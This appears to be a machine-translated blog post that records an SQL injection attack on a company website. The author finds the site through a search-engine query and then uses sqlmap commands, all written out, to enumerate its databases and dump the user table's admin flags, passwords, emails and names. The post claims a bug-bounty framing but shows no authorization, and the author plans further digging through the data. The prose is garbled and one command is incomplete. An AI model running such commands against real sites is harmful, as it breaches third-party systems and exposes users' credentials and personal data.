Record the SQL injection vulnerability of XX company

In the morning , When I get up , My friend , Ask me to participate in public welfare SRC. Then I was dragged to explore public welfare SRC. I opened it. Google Search for ：inurl: Science and technology company . Then I opened a website . I previewed the website and found ?id Because of occupational disease . I am here ?id After that, a Single quotation marks ok ah . The page changes . I guess so xss perhaps SQL Inject holes .

  Start penetration testing .

take out sqlmap Just a shuttle .

python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="

The result is really flawed . Then continue to test ,

python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs

Here are two libraries ：bdm818993245_db,information_schema

Then a shuttle .

python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables

bdm818993245_db Under the database 9 A watch :

| user             || gplat_book       || gplat_news       || gplat_newsclass  || gplat_newsclass2 || href             || job              || job_add          || lawyer_wenda     |

Next query user The following administrator and password .

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns

  Space allowed user The following are 13 Columns ：

+-----------+---------------+| Column    | Type          |+-----------+---------------+| adder     | varchar(8)    || admin     | int(2)        || email     | varchar(60)   || grade     | varchar(12)   || id        | int(6)        || image     | varchar(70)   || name      | varchar(60)   || pass      | varchar(60)   || phone     | varchar(14)   || qianming  | varchar(100)  || times     | datetime      || up_time   | datetime      || xingb     | varchar(2)    |+-----------+---------------+

Next query user below admni and pass The data of ：

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump

Next, collect the data of the database ：

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump

Then collect data ：

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C

Query the user name of the administrator ：

python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C  name --dump

The collection is almost done . End the penetration test . I will study the rest of the databases, tables and columns slowly .

summary ：

SQl Injection try to use hand injection . Because tools run websites . It's easy to jump .

  My public number . Please take care of me .